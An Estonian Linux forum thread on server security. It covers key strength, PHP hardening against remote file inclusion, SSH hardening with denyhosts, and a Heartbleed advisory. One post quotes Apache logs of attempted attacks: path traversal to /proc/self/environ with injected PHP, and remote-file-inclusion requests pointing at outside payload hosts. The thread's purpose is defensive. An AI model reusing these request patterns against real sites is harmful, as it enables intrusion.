| Autor | 
Sõnum | 
 
johnsmith 
Vana Pingviin  
 
  
   
Vanus: 51 
Liitunud: 24.07.2006  
Postitused: 714  
Asukoht: Universum  
Distributsioon: Ubuntu/Gentoo/FreeBSD 
 
   
 |  
 
 
 
  
  | 
 
 	  | Tsitaat:		 | 	 		  			
Ma võin nüüd mööda panna, aga kas mitte pole avaliku-salajase võtme põhise krüptograafia "muukimatus" (erinevalt ühe võtmega krüptost) matemaatiliselt tõestamata?    Ja kuidas nende kvantarvutite tulek seda mõjutama pidi?
 
.			  		 | 	  
 
 
Täitsa õige, me ei tea kas on mingi tagauks algoritmi näol olemas. 
 
Ma küll usun, et me saame sellest ka teada sellega ju tegeletakse kogu aeg.
 
Praegu teadaolevalt tuleb siiski kasutada katse eksituse meetodit korrutades kahte algarvu omavahel ja võrreldes tulemust kräkitava avaliku võtmega.
 
2048 bitist avalikku võtit võib võrrelda tugevuselt 128 bitise sümeetrilise võtmega. Minu teada on murtud mingi 50 bitine sümmeetriline võti aga probleem on selles, et võti tugevneb potensis- 90bitine võti = 2 potensis 90 aga 128 bitine võti on juba 2 potensis 128. 
 
 
Asümmeetrilist võtit 1024 bitti loetakse praegu veel küllalt tugevaks. Pealegi ei anna mingi krüpteering nagunii 100% kaitset. Kassakappidele antakse ju ka turvasertifikaat selle järgi kui palju ja milliseid vahendeid ja aega läks kapi lahtisaamiseks. Kassakapid läbivad testi kus lukksepad üritavad kappi lahti saada ja olenevalt sellest kui raske on kappi lahti saada võtavad lukksepad järjest karmimad riistad kasutusele kuni kapp saadakse lahti.
 
 
Avalik võti toimibki sarnaselt id kaardile, sul on midagi mida teistel pole kuigi jah avalikust võtmest on võimalik teoreetiliselt salajase võtme välja arvutada.
 
Peab lihtsalt ära ootama millal pea sisse implantaadina mikrokiip pannakse siis pole muud kui paned pea lugejasse ja logid sisse.
 | 
 
 | 
 |  
 
 | 
 
 
 
 | 
 
 
 | 
 | 
    | 
 
markus 
Pingviini kasutaja  
 
  
   
Vanus: 40 
Liitunud: 11.08.2006  
Postitused: 43  
Asukoht: Tartu  
Distributsioon: Gentoo 
 
   
 |  
 
 | 
 | 
   | 
 
uniz 
Vana Pingviin  
 
  
   
Vanus: 46 
Liitunud: 18.05.2006  
Postitused: 764  
  
Distributsioon: ubuntucare 
 
   
 |  
 
 | 
 | 
    | 
 
olavsu1
  
   
Vana Pingviin  
 
 
   
Vanus: 49 
Liitunud: 01.12.2006  
Postitused: 923  
  
Distributsioon: ubuntu, mandriva 
 
   
 |  
 
 
 
  
  | 
 
kuna minu enda servu pihta tehakse enamuses  remote file inclusion attack'i
 
 
siis leitsin sellise koha http://www.webmasterworld.com/apache/3448091.htm
 
 
seal soovitatakse lisaks htacces falile veel php.ini fali muuta
 
 
register_globals = Off
 
allow_url_fopen = Off
 
 
// ise peaksin vist rahukiult hingata saama.
 | 
 
 | 
 |  
 
 | 
 
 _________________ olen Troll  ja ootan  pingviin.org konto sulgemist.
 
 | 
 
 
 | 
 | 
  | 
 
JannoT 
Pingviini kasutaja  
 
  
   
 
Liitunud: 10.05.2008  
Postitused: 63  
Asukoht: Tallinn  
Distributsioon: Arch 
 
   
 |  
 
 
 
  
  | 
 
 	  | olavsu1 kirjutas:		 | 	 		  			kuna minu enda servu pihta tehakse enamuses  remote file inclusion attack'i
 
siis leitsin sellise koha  http://www.webmasterworld.com/apache/3448091.htm
seal soovitatakse lisaks htacces falile veel php.ini fali muuta
 
register_globals = Off
 
allow_url_fopen = Off
 
// ise peaksin vist rahukiult hingata saama.			  		 | 	  
 
 
Sul oli register globals on? :O See on üks suurimaid turvavigasid üldse ju.  
 
Vähemalt php 6 kaob antud valik ära. (Y) Register globals peaks ikka off olema koguaeg.
 | 
 
 | 
 |  
 
 | 
 
 
 
 | 
 
 
 | 
 | 
    | 
 
olavsu1
  
   
Vana Pingviin  
 
 
   
Vanus: 49 
Liitunud: 01.12.2006  
Postitused: 923  
  
Distributsioon: ubuntu, mandriva 
 
   
 |  
 
 
 
  
  | 
 
 	  | Tsitaat:		 | 	 		  | 			 Sul oli register globals on? :O See on üks suurimaid turvavigasid üldse ju.			 		 | 	  
 
 
ei,  mul oli too teine asi sees.
 
 
 	  | Kood:		 | 	 		  | 			 srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET //index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 403 999 \-" "XXX<? echo \"w0000t\"; ?>XXX" ClientIP: 77.221.130.14
 
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET //index.php?option=com_custompages&cpage=http://www.lesovik.de/files/i?? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" ClientIP: 77.221.130.14
 
srv014.infobox.ru - - [24/Nov/2008:20:38:50 +0200] "GET /errors.php?error=http://www.lesovik.de/files/i?? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" ClientIP: 77.221.130.14			 		 | 	  
 
 
peab ikka maailm haigeid täis olema ....   zombistatud arvutid zombistatud serverid...  korra uurisin kuhu nood CLI  failikesed pandud on, täiesti süütukestesse joomla ja phpBBx baasil foorumitesse.
 
 
 
WOW  kellegil on suudetud Linux tuuri panna.  vaevalt, et linuxi kasutaja hakkaks ise põrsatempe tegema.
 
 	  | Kood:		 | 	 		  | 			 76.9.3.130 - - [25/Nov/2008:01:29:38 +0200] "GET /logi.htm/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.excelsiorfm.com.br/images/idne.txt??%0D? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" ClientIP: 76.9.3.130
 
76.9.3.130 - - [25/Nov/2008:01:29:38 +0200] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.excelsiorfm.com.br/images/idne.txt??%0D? HTTP/1.1" 403 999 \-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" ClientIP: 76.9.3.130
 
			 		 | 	  
 | 
 
 | 
 |  
 
 | 
 
 _________________ olen Troll  ja ootan  pingviin.org konto sulgemist.
 
 | 
 
 
 | 
 | 
  | 
 
pisi 
Pingviini kasutaja  
 
  
   
 
Liitunud: 09.07.2007  
Postitused: 65  
Asukoht: Eesti  
Distributsioon: Debian / Darwin 
 
   
 |  
 
 
 
  
  | 
 
Kui vähegi võimalik, lubada ainult RSA autentimine (sshd_config failis RSAAuthentication yes ja kõik muud *Authentication no). Nagistamine on siis pigem tüütu kui ohtlik, nagistamise tüütuse vastu aitab SSH pordi muutmine.
 
 
Lisaks, kui kasutajate hulk on piiratud ja nad on tehniliselt võimekamad, võib mõelda ainult ID-kaardi võtmetega ligipääsu lubamisele. See tagab selle, et kellegi nõrgalt valvatud kliendimasinast võtmed pihta pannakse.
 | 
 
 | 
 |  
 
 | 
 
 _________________ pisi - muidumees ja maailmaparandaja
 
@MartinPaljak.net
 
 | 
 
 
 | 
 | 
     | 
 
laurivosandi 
Moderaator  
 
 
   
Vanus: 37 
Liitunud: 08.07.2005  
Postitused: 647  
Asukoht: Tallinn  
Distributsioon: Estobuntu, Debian 
 
   
 |  
 
 
 
  
  | 
 
Tere,
 
 
soovitaks paigaldada inimestel:
 
 
denyhosts - a utility to help sys admins thwart ssh crackers
 
 
ehk:
 
 
sudo apt-get install denyhosts
 
 
Skaneerib ssh logisid ja paneb ründajate IP-d kohe /etc/hosts.deny faili
 
 
Lauri
 | 
 
 | 
 |  
 
 | 
 
 
 
 | 
 
 
 | 
 | 
     | 
 
obundra 
Vana Pingviin  
 
  
   
Vanus: 50 
Liitunud: 04.08.2005  
Postitused: 1213  
Asukoht: 127.0.0.1  
Distributsioon: RHEL, Solaris, Debian, Gentoo 
 
   
 |  
 
 
 
  
  | 
 
Avastati ohtlik turvaauk OpenSSL-is, rohkem infot http://heartbleed.com
 
Juba on olemas ka uuendused, milles viga parandatud, laske oma pakihalduril uuendada OpenSSL 1.0.1g peale või kui see pole võimalik, siis tuleks OpenSSL ümber kompileerida suvandiga -DOPENSSL_NO_HEARTBEATS.
 
Haavatavust saab lihtsalt testida skripti abil, https://gist.github.com/sh1n0b1/10100394
 
 	  | Kood:		 | 	 		  | 			 ./ssltest.py serverinimi -p 443			 		 | 	  
 
Haavatavad on:
 
OpenSSL 1.0.1 kuni 1.0.1f , OpenSSL 1.0.2-beta ja 1.0.2-beta1
 
Haavatavad pole:
 
OpenSSL 1.0.0 
 
OpenSSL 0.9.8-beta1
 
 
E: Väike tähelepanek Debian wheezy puhul.Viga on parandatud alates versioonist openssl 1.0.1e-2+deb7u5.Kui uuendada ainult openssl pakk, siis sellest ei piisa.Eraldi tuleb uuendada ka libssl pakk, kuna uuendades ainult openssl pakki versioonile 1.0.1e-2+deb7u6, jäetakse libssl uuendamata, sest openssl 1.0.1e-2+deb7u6 sõltub libssl1.0.0>=1.0.1  ja see tingimus on täidetud.
 | 
 
 | 
 |  
 
 | 
 
 _________________ IT teenused
 
  Viimati muutis obundra 09.04.2014, 16:32; muudetud 1 kord
 | 
 
 
 | 
 | 
    | 
 
sander85 
Vana Pingviin  
 
  
   
Vanus: 40 
Liitunud: 08.08.2005  
Postitused: 4359  
Asukoht: Tallinn (vahel ka Virtsu)  
Distributsioon: Mageia, Debian, CentOS 
 
   
 |  
 
 
 
  
  | 
 
 	  | obundra kirjutas:		 | 	 		  			Avastati ohtlik turvaauk OpenSSL-is, rohkem infot  http://heartbleed.com
Juba on olemas ka uuendused, milles viga parandatud, laske oma pakihalduril uuendada OpenSSL 1.0.1g peale või kui see pole võimalik, siis tuleks OpenSSL ümber kompileerida suvandiga -DOPENSSL_NO_HEARTBEATS.
 
Haavatavust saab lihtsalt testida skripti abil,  https://gist.github.com/sh1n0b1/10100394
 	  | Kood:		 | 	 		  | 			 ./ssltest.py serverinimi -p 443			 		 | 	  
Haavatavad on:
 
OpenSSL 1.0.1 kuni 1.0.1f , OpenSSL 1.0.2-beta ja 1.0.2-beta1
 
Haavatavad pole:
 
OpenSSL 1.0.0 
 
OpenSSL 0.9.8-beta1			  		 | 	  
 
 
Peale teekide uuendamist tuleb kindlasti ka kontrollida, et kõik vajalikud teenused (nt apache, postfix jne) saaks taaskäivitatud.
 | 
 
 | 
 |  
 
 | 
 
 _________________
      
 
 | 
 
 
 | 
 | 
    | 
 
imre 
Vana Pingviin  
 
  
   
 
Liitunud: 16.08.2005  
Postitused: 2648  
Asukoht: Saku kant  
Distributsioon: Ubuntu 
 
   
 |  
 
 
 
  
| 
 | 
 
 _________________ Enne teema püstitamist kasutage OTSINGUT
 
Küsi targalt:  Infot siit! 
 
Kui aru ei saa, siis küsi.
 
 | 
 
 
 | 
 | 
   | 
 
rastik 
Pingviini külastaja  
 
 
   
 
Liitunud: 27.03.2014  
Postitused: 19  
  
Distributsioon: Trisquel Gnu/Linux 
 
   
 |  
 
 
 
  
  | 
 
 	  | v6sa kirjutas:		 | 	 		  | 			 Tere,
 
 
soovitaks paigaldada inimestel:
 
 
denyhosts - a utility to help sys admins thwart ssh crackers
 
 
ehk:
 
 
sudo apt-get install denyhosts
 
 
Skaneerib ssh logisid ja paneb ründajate IP-d kohe /etc/hosts.deny faili
 
 
Lauri			 		 | 	  
 
Olen ka denyhosts kasutamise poolt ssh serveris, kuid  sellest ei ole kasu kui krüpteeritud teenust üle võrgu pealt kuulatakse.
 
 
Parem on hoopis tulemüüri reeglites või ssh seadistusfailis lubada ainult teatud ip aadressid.
 | 
 
 | 
 |  
 
 | 
 
 
 
 | 
 
 
 | 
 | 
   | 
| 
 |